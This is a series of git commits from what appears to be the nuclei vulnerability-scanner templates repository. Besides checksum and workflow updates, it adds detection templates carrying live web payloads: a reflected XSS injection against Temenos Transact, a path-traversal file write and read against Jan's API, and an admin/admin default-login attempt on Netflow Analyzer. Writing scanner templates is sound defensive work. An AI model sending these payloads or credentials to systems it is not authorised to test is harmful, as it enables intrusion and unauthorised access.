'http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml' - 'http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml' + - 'network/cves/2024/CVE-2024-6746.yaml' workflow_dispatch: jobs: triggerRemoteWorkflow: From 6aab5bd40fce1b882f0aca125cdfcbca26826b99 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 18 Jul 2024 06:18:46 +0000 Subject: [PATCH 1391/1841] Auto Generated Templates Checksum [Thu Jul 18 06:18:46 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index b6ba5e0c81..2d28190b45 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3582,7 +3582,7 @@ http/default-logins/franklin-fueling-default-login.yaml:49d5c8cf093e8d8af30d355d http/default-logins/frps/frp-default-login.yaml:058cf43e920ef4d804f4285f55bf3d9ee69dc9a7 http/default-logins/fuelcms/fuelcms-default-login.yaml:0b4d5eb309b21c12dfb96b09fecdc5aaeb645d4d http/default-logins/geoserver/geoserver-default-login.yaml:8dc4ab620a08bae7856256d201465b1fb0411b18 -http/default-logins/gitblit/gitblit-default-login.yaml:14e1dfee7c13946bba72e9cf020f901106447b84 +http/default-logins/gitblit/gitblit-default-login.yaml:d9a1743029ff629ad54d76e1efc046f115fa4da6 http/default-logins/gitlab/gitlab-weak-login.yaml:f81685731ba26b91137744dccb03f4a2867f5eef http/default-logins/glpi/glpi-default-login.yaml:3ed70cd4c1fd3b0c7688f9fc6ffe9c0b3414829e http/default-logins/goip-default-login.yaml:7cfb944af1d88cf1b85de2d3517af441f6d45196 @@ -8897,7 +8897,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:69b84028735127f4a680ff4a0e06ec8164d43ad9 +templates-checksum.txt:e62d58150a0b3443217102ab5ac5ec45f4d9f816 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 @@ -9002,6 +9002,7 @@ workflows/mida-eframework-workflow.yaml:165907f04a8eddcabafc5c23b57e98409099bfbb workflows/mobileiron-workflow.yaml:bc8cb354867235ef637e0bfdbbbe35438b19b212 workflows/moodle-workflow.yaml:cdd7206da5acc8a292b8ac736e9023d802c3a6a0 workflows/movable-workflow.yaml:e8ba633bfbfa7d3a2d9a8e69b82c787e71275462 +workflows/nacos-workflow.yaml:aaa4f60615f72005f19de37c7c0abddcc52ec853 workflows/netgear-workflow.yaml:a9d5d96e3e1ff270f1864ba7fd71a7afa6069fc5 workflows/netsweeper-workflow.yaml:10ce8a9bce85426ed47e84decea64998b8c4cc9a workflows/nette-workflow.yaml:890e3d97a83e6c1c4d846117dfb58e20f1b997a7 From 765a45dad92c009e4350c0641b2b3dd2c4ad1aac Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 18 Jul 2024 06:19:19 +0000 Subject: [PATCH 1392/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 0172690522..577ed81b09 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -36,6 +36,7 @@ on: - 'http/vulnerabilities/nextjs/nextjs-middleware-cache.yaml' - 'http/vulnerabilities/nextjs/nextjs-rsc-cache.yaml' - 'network/cves/2024/CVE-2024-6746.yaml' + - 'workflows/nacos-workflow.yaml' workflow_dispatch: jobs: triggerRemoteWorkflow: From a4d812c6894082ce29e8b518494443f5345a2ede Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 18 Jul 2024 06:20:11 +0000 Subject: [PATCH 1393/1841] Auto Template Signing [Thu Jul 18 06:20:11 UTC 2024] :robot: --- http/cves/2024/CVE-2024-32238.yaml | 1 + network/cves/2024/CVE-2024-6746.yaml | 1 + 2 files changed, 2 insertions(+) diff --git a/http/cves/2024/CVE-2024-32238.yaml b/http/cves/2024/CVE-2024-32238.yaml index 943b183d3e..21e282638b 100644 --- a/http/cves/2024/CVE-2024-32238.yaml +++ b/http/cves/2024/CVE-2024-32238.yaml @@ -49,3 +49,4 @@ http: - type: status status: - 200 +# digest: 4a0a004730450220201878cc58288f49ab829ff3270b6f402ba4251f76094e5e2d5f5bc6be824c1102210092e0e556465f7788407d6b160af9f4896d3a26219f756fdbbf1a28b770c083f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/network/cves/2024/CVE-2024-6746.yaml b/network/cves/2024/CVE-2024-6746.yaml index abb0c3b999..df1bc64da9 100644 --- a/network/cves/2024/CVE-2024-6746.yaml +++ b/network/cves/2024/CVE-2024-6746.yaml @@ -52,3 +52,4 @@ http: - 'contains_all(body,"bit app support","fonts","extensions")' - 'status_code == 200' condition: and +# digest: 4a0a00473045022100ab7c302013c663282ee437e7ce5cfa592e11d90859c17e5c5c31c26d09835df90220639425815d849a66a4d04b48ddf1f1e6d9e2fc6192ad6a31b20dc25ba8a1e81b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 55a60de3e62c5495bb4a73a9bcc7f1359f9ad8a5 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 18 Jul 2024 12:17:06 +0530 Subject: [PATCH 1394/1841] Update and rename CVE-2022-38322.yaml to http/cves/2024/CVE-2022-38322.yaml --- CVE-2022-38322.yaml | 40 ------------------------------ http/cves/2024/CVE-2022-38322.yaml | 31 +++++++++++++++++++++++ 2 files changed, 31 insertions(+), 40 deletions(-) delete mode 100644 CVE-2022-38322.yaml create mode 100644 http/cves/2024/CVE-2022-38322.yaml diff --git a/CVE-2022-38322.yaml b/CVE-2022-38322.yaml deleted file mode 100644 index 0c5e885069..0000000000 --- a/CVE-2022-38322.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: CVE-2022-38322 - -info: - name: Multiple Reflected XSS in Temenos Transact (Previously T24) - author: qotoz - severity: high - tags: xss, transact, t24 , temenos - reference: - - https://www.qotoz.com/posts/Temenos-Transact-XSS-CVE/ - -requests: - - method: GET - path: - - "{{BaseURL}}/jsps/enqrequest.jsp?enqaction=XSS&enqname=XSS&routineArgs=XSS&skin=XSS&compId=XSS&usrRole=XSS&compScreen=XSS&contextRoot=&windowName=XSS&user=XSS&reqTabid=XSS&WS_replaceAll=XSS&WS_parentComposite=XSS&command=&formToken=" - - "{{BaseURL}}/jsps/about.jsp?skin=XSS&release=XSS" - - "{{BaseURL}}/jsps/continue.jsp?cfwstage=XSS&compId=XSS&skin=XSS&user=XSS&windowName=XSS" - - "{{BaseURL}}/jsps/customMessage.jsp?Message=XSS" - - "{{BaseURL}}/jsps/dropdown.jsp?title=XSS&routineArgs=XSS&routineName=XSS&searchCriteria=XSS&dropfield=XSS&compId=XSS&usrRole=XSS&skin=XSS&windowName=XSS&parentWin=XSS" - - "{{BaseURL}}/jsps/fileUpload.jsp?skin=XSS&trans_upload=XSS&trans_uploading=XSS&fragment=XSS" - - "{{BaseURL}}/jsps/genDocRequest.jsp?imageId=XSS&isPopUp=XSS&enqid=XSS" - - "{{BaseURL}}/jsps/helprequest.jsp?url=XSS" - - "{{BaseURL}}/jsps/submitWindow.jsp?requestType=XSS&routineArgs=XSS&companyId=XSS&unlock=XSS&closing=XSS&pwprocessid=XSS&windowName=XSS" - - "{{BaseURL}}/jsps/svgInstall.jsp?skin=XSS" - - "{{BaseURL}}/jsps/txnrequest.jsp?usrRole=XSS&routineArgs=XSS&compId=XSS&compScreen=XSS&user=XSS&skin=XSS" - - "{{BaseURL}}/jsps/genrequest.jsp?routineName=XSS&routineArgs=XSS&skin=XSS&compId=XSS&compScreen=XSS&contextRoot=&user=XSS&formToken=" - - "{{BaseURL}}/jsps/helprequest.jsp?url=XSS%27)%22+onerror=%22confirm(%27XSS%27)%22+test=%22" - - headers: - User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36" - - matchers-condition: and - matchers: - - type: word - words: - - "XSS" - part: body - - - type: status - status: - - 200 \ No newline at end of file diff --git a/http/cves/2024/CVE-2022-38322.yaml b/http/cves/2024/CVE-2022-38322.yaml new file mode 100644 index 0000000000..b1f88d9309 --- /dev/null +++ b/http/cves/2024/CVE-2022-38322.yaml @@ -0,0 +1,31 @@ +id: CVE-2022-38322 + +info: + name: Temenos Transact - Reflected Cross-Site Scripting (XSS) + author: qotoz + severity: high + description: | + Multiple vulnerabilities in Temenos Transact (formerly T24) that allows multiple reflected cross-site scripting (XSS) attacks. + reference: + - https://www.qotoz.com/posts/Temenos-Transact-XSS-CVE/ + metadata: + verified: true + max-request: 1 + shodan-query: http.title:"transact sign in","t24 sign in" + tags: cve,cve2022,temenos,transact,xss + +http: + - method: GET + path: + - "{{BaseURL}}/jsps/helprequest.jsp?url=%27)%22+onerror=%22confirm(%27document.domain%27)%22" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - setupHelp('')" onerror="confirm('document.domain') + + - type: status + status: + - 200 From b8021f8ca9b6e2dfd0840232bcb550e46e4b4242 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 18 Jul 2024 12:18:22 +0530 Subject: [PATCH 1395/1841] Rename CVE-2022-38322.yaml to CVE-2022-38322.yaml --- http/cves/{2024 => 2022}/CVE-2022-38322.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename http/cves/{2024 => 2022}/CVE-2022-38322.yaml (100%) diff --git a/http/cves/2024/CVE-2022-38322.yaml b/http/cves/2022/CVE-2022-38322.yaml similarity index 100% rename from http/cves/2024/CVE-2022-38322.yaml rename to http/cves/2022/CVE-2022-38322.yaml From 4cc5a9ce98052debb14e3f2d3a1dba0aa99c0700 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 18 Jul 2024 12:38:08 +0530 Subject: [PATCH 1396/1841] Create netflow-analyzer-panel.yaml --- .../netflow-analyzer-panel.yaml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 http/exposed-panels/netflow-analyzer-panel.yaml diff --git a/http/exposed-panels/netflow-analyzer-panel.yaml b/http/exposed-panels/netflow-analyzer-panel.yaml new file mode 100644 index 0000000000..561d9dd751 --- /dev/null +++ b/http/exposed-panels/netflow-analyzer-panel.yaml @@ -0,0 +1,28 @@ +id: netflow-analyzer-panel + +info: + name: Netflow Analyzer Login - Panel + author: DhiyaneshDk + severity: info + metadata: + shodan-query: html:"Login - Netflow Analyzer" + verified: true + max-request: 1 + tags: netflow,analyzer,panel,login + +http: + - raw: + - | + GET /netflow/jspui/NetworkSnapShot.jsp HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Login - Netflow Analyzer" + + - type: status + status: + - 200 From b39515f604a1d9f36b066182c6360b58a6be4f52 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 18 Jul 2024 12:43:38 +0530 Subject: [PATCH 1397/1841] fix-trailspace --- http/exposed-panels/netflow-analyzer-panel.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/exposed-panels/netflow-analyzer-panel.yaml b/http/exposed-panels/netflow-analyzer-panel.yaml index 561d9dd751..23e6e0f4a1 100644 --- a/http/exposed-panels/netflow-analyzer-panel.yaml +++ b/http/exposed-panels/netflow-analyzer-panel.yaml @@ -15,7 +15,7 @@ http: - | GET /netflow/jspui/NetworkSnapShot.jsp HTTP/1.1 Host: {{Hostname}} - + matchers-condition: and matchers: - type: word From 7e7bae6ba9c75005dd60655d0b4a8eb27a14bf0d Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 18 Jul 2024 13:04:30 +0530 Subject: [PATCH 1398/1841] Create jan-api-lfi.yaml --- http/vulnerabilities/other/jan-api-lfi.yaml | 50 +++++++++++++++++++++ 1 file changed, 50 insertions(+) create mode 100644 http/vulnerabilities/other/jan-api-lfi.yaml diff --git a/http/vulnerabilities/other/jan-api-lfi.yaml b/http/vulnerabilities/other/jan-api-lfi.yaml new file mode 100644 index 0000000000..cc3b806c86 --- /dev/null +++ b/http/vulnerabilities/other/jan-api-lfi.yaml @@ -0,0 +1,50 @@ +id: jan-api-lfi + +info: + name: Jan's API interface writeFileSync & appendFileSync - Arbitrary File Upload + author: pussycat0x + severity: high + description: | + Jan's API interface writeFileSync and appendFileSync does not filter parameters, resulting in an arbitrary file upload vulnerability. + reference: + - https://github.com/wy876/POC/blob/main/Jan%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md + - https://github.com/HackAllSec/CVEs/blob/81e63ae5caae40be47905adae601e0c2f480190b/Jan%20Arbitrary%20File%20Upload%20vulnerability/README.md + metadata: + fofa-query: icon_hash="-165268926" + max-request: 2 + tags: jan,lfi +variables: + +http: + - raw: + - | + POST /v1/app/appendFileSync HTTP/1.1 + Host: {{Hostname}} + Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 + Accept-Encoding: gzip, deflate, br + Referer: {{RootURL}} + contentType: application/json + Origin: {{RootURL}} + + ["/../../../../../tmp/{{randstr}}.txt","{{randstr}}"] + - | + POST /v1/app/readFileSync HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip, deflate, br + Referer: {{RootURL}} + contentType: application/json + Content-Type: text/plain;charset=UTF-8 + Origin: {{RootURL}} + + ["file:/../../../../../tmp/{{randstr}}.txt","utf-8"] + + matchers-condition: and + matchers: + - type: word + part: body_2 + words: + - '{{randstr}}' + + - type: status + status: + - 200 From 385252564c33dbb2168d536bcd2b22418f1bba95 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 18 Jul 2024 13:06:25 +0530 Subject: [PATCH 1399/1841] Create netflow-default-login.yaml --- .../netflow/netflow-default-login.yaml | 45 +++++++++++++++++++ 1 file changed, 45 insertions(+) create mode 100644 http/default-logins/netflow/netflow-default-login.yaml diff --git a/http/default-logins/netflow/netflow-default-login.yaml b/http/default-logins/netflow/netflow-default-login.yaml new file mode 100644 index 0000000000..a9b32cd7b6 --- /dev/null +++ b/http/default-logins/netflow/netflow-default-login.yaml @@ -0,0 +1,45 @@ +id: netflow-default-login + +info: + name: Netflow Analyzer - Default Login + author: DhiyaneshDK + severity: high + description: | + Netflow Analyzer default login was discovered. + metadata: + shodan-query: html:"Login - Netflow Analyzer" + verified: true + max-request: 1 + tags: default-login,netflow + +variables: + username: "admin" + password: "admin" + +http: + - raw: + - | + POST /netflow/jspui/j_security_check HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Referer: {{RootURL}}/netflow/jspui/NetworkSnapShot.jsp + + radiusUserEnabled=false&AUTHRULE_NAME=Authenticator&j_username={{username}}&j_password={{password}}&Submit=Login + + - | + GET /netflow/jspui/dashBoard.do HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body_2 + words: + - "Device Groups" + - "Logout" + condition: and + + - type: status + status: + - 200 From 21d8af7fa88b108fb1c57eaae38650a38c24d184 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 18 Jul 2024 13:12:55 +0530 Subject: [PATCH 1400/1841] matcher-update --- .../netflow/netflow-default-login.yaml | 19 ++++++++----------- 1 file changed, 8 insertions(+), 11 deletions(-) diff --git a/http/default-logins/netflow/netflow-default-login.yaml b/http/default-logins/netflow/netflow-default-login.yaml index a9b32cd7b6..82154b50f9 100644 --- a/http/default-logins/netflow/netflow-default-login.yaml +++ b/http/default-logins/netflow/netflow-default-login.yaml @@ -27,19 +27,16 @@ http: radiusUserEnabled=false&AUTHRULE_NAME=Authenticator&j_username={{username}}&j_password={{password}}&Submit=Login - - | - GET /netflow/jspui/dashBoard.do HTTP/1.1 - Host: {{Hostname}} - matchers-condition: and matchers: - type: word - part: body_2 + part: set_cookie words: - - "Device Groups" - - "Logout" - condition: and + - "NFA_Jsession=" + - "JSESSIONID" + condition: or - - type: status - status: - - 200 + - type: word + part: header + words: + - "/netflow;jsessionid" From 96b190a34e156b27154f9c4946565d9d5c6cba37 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 18 Jul 2024 13:37:51 +0530 Subject: [PATCH 1401/1841] Create hal-management-panel.yaml --- http/exposed-panels/hal-management-panel.yaml | 26 +++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 http/exposed-panels/hal-management-panel.yaml diff --git a/http/exposed-panels/hal-management-panel.yaml b/http/exposed-panels/hal-management-panel.yaml new file mode 100644 index 0000000000..5e5b7bfb45 --- /dev/null +++ b/http/exposed-panels/hal-management-panel.yaml @@ -0,0 +1,26 @@ +id: hal-management-panel + +info: + name: HAL Management Console Panel + author: DhiyaneshDK + severity: info + description: | + HAL Management Console login panel was discovered + metadata: + verified: true + max-request: 1 + shodan-query: html:"HAL Management Console" + tags: panel,login,hal + +http: + - raw: + - | + GET /console/index.html HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "HAL Management Console" From 8ab7cf18f27e9320694f350db7a86e6388a6ca23 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 18 Jul 2024 13:44:37 +0530 Subject: [PATCH 1402/1841] Create mongod-exposure.yaml --- http/misconfiguration/mongod-exposure.yaml | 30 ++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 http/misconfiguration/mongod-exposure.yaml diff --git a/http/misconfiguration/mongod-exposure.yaml b/http/misconfiguration/mongod-exposure.yaml new file mode 100644 index 0000000000..9b52d7c7bb --- /dev/null +++ b/http/misconfiguration/mongod-exposure.yaml @@ -0,0 +1,30 @@ +id: mongod-exposure + +info: + name: MongoD Server - Exposure + author: DhiyaneshDk + severity: medium + metadata: + verified: true + max-request: 1 + shodan-query: html:"mongod" + tags: mongod,exposure,info-leak + +http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "mongod" + - "List all commands" + condition: and + + - type: status + status: + - 200 From ae8dc91ea04e13943ea42ce3db26d47000b92ff1 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Thu, 18 Jul 2024 15:23:22 +0530 Subject: [PATCH 1403/1841] minor-update --- http/cves/2023/CVE-2023-43662.yaml | 15 ++++++++++++--- 1 file changed, 12 insertions(+), 3 deletions(-) diff --git a/http/cves/2023/CVE-2023-43662.yaml b/http/cves/2023/CVE-2023-43662.yaml index 8b031b3aa0..40f8c7834a 100644 --- a/http/cves/2023/CVE-2023-43662.yaml +++ b/http/cves/2023/CVE-2023-43662.yaml @@ -1,11 +1,15 @@ id: CVE-2023-43662 info: - name: ShokoServer System - LFI + name: ShokoServer System - Local File Inclusion (LFI) author: pussycat0x severity: high description: | - ShokoServer is a media server which specializes in organizing anime. In affected versions the `/api/Image/WithPath` endpoint is accessible without authentication and is supposed to return default server images. The endpoint accepts the parameter `serverImagePath`, which is not sanitized in any way before being passed to `System.IO.File.OpenRead`, which results in an arbitrary file read. This issue may lead to an arbitrary file read which is exacerbated in the windows installer which installs the ShokoServer as administrator. Any unauthenticated attacker may be able to access sensitive information and read files stored on the server. The `/api/Image/WithPath` endpoint has been removed in commit `6c57ba0f0` which will be included in subsequent releases. Users should limit access to the `/api/Image/WithPath` endpoint or manually patch their installations until a patched release is made. This issue was discovered by the GitHub Security lab and is also indexed as GHSL-2023-191. + ShokoServer is a media server which specializes in organizing anime. In affected versions the `/api/Image/WithPath` endpoint is accessible without authentication and is supposed to return default server images. The endpoint accepts the parameter `serverImagePath`, which is not sanitized in any way before being passed to `System.IO.File.OpenRead`, which results in an arbitrary file read. + impact: | + This issue may lead to an arbitrary file read which is exacerbated in the windows installer which installs the ShokoServer as administrator. Any unauthenticated attacker may be able to access sensitive information and read files stored on the server. + remediation: | + The `/api/Image/WithPath` endpoint has been removed in commit `6c57ba0f0` which will be included in subsequent releases. Users should limit access to the `/api/Image/WithPath` endpoint or manually patch their installations until a patched release is made. This issue was discovered by the GitHub Security lab and is also indexed as GHSL-2023-191. reference: - https://github.com/wy876/POC/blob/main/Ncast%E9%AB%98%E6%B8%85%E6%99%BA%E8%83%BD%E5%BD%95%E6%92%AD%E7%B3%BB%E7%BB%9F%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md - https://github.com/ShokoAnime/ShokoServer/commit/6c57ba0f073d6be5a4f508c46c2ce36727cbce80 @@ -22,7 +26,7 @@ info: vendor: shokoanime product: shokoserver fofa-query: title="Shoko WEB UI" - tags: cve,cve2023 + tags: cve,cve2023,shoko,web-aui,lfi http: - method: GET @@ -39,6 +43,11 @@ http: - "extensions" condition: and + - type: word + part: content_type + words: + - "text/plain" + - type: status status: - 200 From 1daf8b9e44c49e1d4dca24b218c1091b0e916843 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Thu, 18 Jul 2024 15:25:36 +0530 Subject: [PATCH 1404/1841] Update CVE-2023-43662.yaml --- http/cves/2023/CVE-2023-43662.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/http/cves/2023/CVE-2023-43662.yaml b/http/cves/2023/CVE-2023-43662.yaml index 40f8c7834a..7af76b3646 100644 --- a/http/cves/2023/CVE-2023-43662.yaml +++ b/http/cves/2023/CVE-2023-43662.yaml @@ -5,9 +5,9 @@ info: author: pussycat0x severity: high description: | - ShokoServer is a media server which specializes in organizing anime. In affected versions the `/api/Image/WithPath` endpoint is accessible without authentication and is supposed to return default server images. The endpoint accepts the parameter `serverImagePath`, which is not sanitized in any way before being passed to `System.IO.File.OpenRead`, which results in an arbitrary file read. + ShokoServer is a media server which specializes in organizing anime. In affected versions the `/api/Image/WithPath` endpoint is accessible without authentication and is supposed to return default server images. The endpoint accepts the parameter `serverImagePath`, which is not sanitized in any way before being passed to `System.IO.File.OpenRead`, which results in an arbitrary file read. impact: | - This issue may lead to an arbitrary file read which is exacerbated in the windows installer which installs the ShokoServer as administrator. Any unauthenticated attacker may be able to access sensitive information and read files stored on the server. + This issue may lead to an arbitrary file read which is exacerbated in the windows installer which installs the ShokoServer as administrator. Any unauthenticated attacker may be able to access sensitive information and read files stored on the server. remediation: | The `/api/Image/WithPath` endpoint has been removed in commit `6c57ba0f0` which will be included in subsequent releases. Users should limit access to the `/api/Image/WithPath` endpoint or manually patch their installations until a patched release is made. This issue was discovered by the GitHub Security lab and is also indexed as GHSL-2023-191. reference: From f869a50a7c4685d4e939202bffbefd14845c4d88 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 18 Jul 2024 09:58:37 +0000 Subject: [PATCH 1405/1841] Auto Generated New Template Addition List [Thu Jul 18 09:58:37 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index dbb6cb7b71..f96d222f85 100644 --- a/.new-additions +++ b/.new-additions @@ -1,6 +1,7 @@ http/cves/2022/CVE-2022-45269.yaml http/cves/2023/CVE-2023-29204.yaml http/cves/2023/CVE-2023-4220.yaml +http/cves/2023/CVE-2023-43662.yaml http/cves/2023/CVE-2023-44012.yaml http/cves/2023/CVE-2023-4450.yaml http/cves/2023/CVE-2023-48728.yaml From 3904fe162bcb5f62feaa3cb432c8d305d8081a26 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Thu, 18 Jul 2024 09:58:44 +0000 Subject: [PATCH 1406/1841] Auto Generated Templates Checksum [Thu Jul 18 09:58:44 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 2d28190b45..c419355510 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3289,6 +3289,7 @@ http/cves/2023/CVE-2023-43325.yaml:cad3358ef79bdf761c1bbb77c839e9af325f506f http/cves/2023/CVE-2023-43326.yaml:f117aa600d3815d4394d93563495b9a183a6b76d http/cves/2023/CVE-2023-43374.yaml:e776da19a0b00d4c913d7c1b0beab3657841b351 http/cves/2023/CVE-2023-43472.yaml:02352f22f7347c7ca98b3eb51d6851fcba2f0b40 +http/cves/2023/CVE-2023-43662.yaml:09016165373d1c055455d6f734d411cdc2ef7e3a http/cves/2023/CVE-2023-43795.yaml:36d3e9de4b3f54d3976afca31c54f6bf5f288b53 http/cves/2023/CVE-2023-44012.yaml:bbecae0c3583a4572602e3fc0c8619bafeb77bad http/cves/2023/CVE-2023-4415.yaml:17cc5b909d851380cf62dcece5db812a7e1ea68a @@ -3460,7 +3461,7 @@ http/cves/2024/CVE-2024-31850.yaml:577eb6159f7a5fa2fa929980f842306c674bf2ca http/cves/2024/CVE-2024-31851.yaml:c68bf4f7214f9abb654a5bb11cd9088cdb1fe690 http/cves/2024/CVE-2024-31982.yaml:1c2a20bde3daf605c529fd67b5538084d7cf0f5b http/cves/2024/CVE-2024-32113.yaml:d33bf2b38e8bb82edabfe4a94fa64fe2aed6cf56 -http/cves/2024/CVE-2024-32238.yaml:bb0dc9c34e200c8c3ee0351e66cd6fad5da57522 +http/cves/2024/CVE-2024-32238.yaml:4293df5ead0b90522ef19d2061ad6bcea6cc07ca http/cves/2024/CVE-2024-32399.yaml:d49df2f63485c7f67792285af884f5daa53513b5 http/cves/2024/CVE-2024-32640.yaml:6d2dacc8495a3cd5bf446bd3a1227b8c15c2fd74 http/cves/2024/CVE-2024-32651.yaml:801c05cf9fff8ede1e378acbaa7f52b17174a55c @@ -8736,7 +8737,7 @@ network/cves/2022/CVE-2022-0543.yaml:cc5abf652c0eeb64ce1c6e9ceca8fb13142c812e network/cves/2022/CVE-2022-24706.yaml:977a6263c91851c548388120854b62e51fce8132 network/cves/2022/CVE-2022-31793.yaml:2db38ef9772fbdbc847e78407b959113ed41f359 network/cves/2023/CVE-2023-33246.yaml:bd0b0fbc109f252476a8872e4e7e6e552d1b01e9 -network/cves/2024/CVE-2024-6746.yaml:0fa73ba53f6333c092af9029d12800a5e2b5d4a6 +network/cves/2024/CVE-2024-6746.yaml:57d0abcd190ae81c0962649f9e99a35d31dbd56f network/default-login/ftp-anonymous-login.yaml:f08d36de58b3fa0aaad6faa31876e88adcca98f7 network/default-login/ftp-weak-credentials.yaml:6706b4c1e7c6209ba1e25289fc1286ea4a85484a network/default-login/ldap-anonymous-login.yaml:a3dcae7c312b0f4f71b307a77bff88492af4ddf4 @@ -8897,7 +8898,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:e62d58150a0b3443217102ab5ac5ec45f4d9f816 +templates-checksum.txt:18230a4439957a3847f46d105206e0c4bce0002f wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From b34372d9fa9501507cfd2218f04f5a0265f07fe4 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Thu, 18 Jul 2024 09:59:24 +0000 Subject: [PATCH 1407/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 577ed81b09..27084dddd6 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -6,6 +6,7 @@ on: - 'http/cves/2022/CVE-2022-45269.yaml' - 'http/cves/2023/CVE-2023-29204.yaml' - 'http/cves/2023/CVE-2023-4220.yaml' + - 'http/cves/2023/CVE-2023-43662.yaml' - 'http/cves/2023/CVE-2023-44012.yaml' - 'http/cves/2023/CVE-2023-4450.yaml' - 'http/cves/2023/CVE-2023-48728.yaml' From d678e270aa139ece2ec7d2c3ff7f04eedd65c44e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Thu, 18 Jul 2024 15:30:10 +0530 Subject: [PATCH 1408/1841] Update lvs-download-lfi.yaml --- http/vulnerabilities/other/lvs-download-lfi.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/vulnerabilities/other/lvs-download-lfi.yaml b/http/vulnerabilities/other/lvs-download-lfi.yaml index 0a129edb31..df6166de40 100644 --- a/http/vulnerabilities/other/lvs-download-lfi.yaml +++ b/http/vulnerabilities/other/lvs-download-lfi.yaml @@ -1,7 +1,7 @@ id: lvs-download-lfi info: - 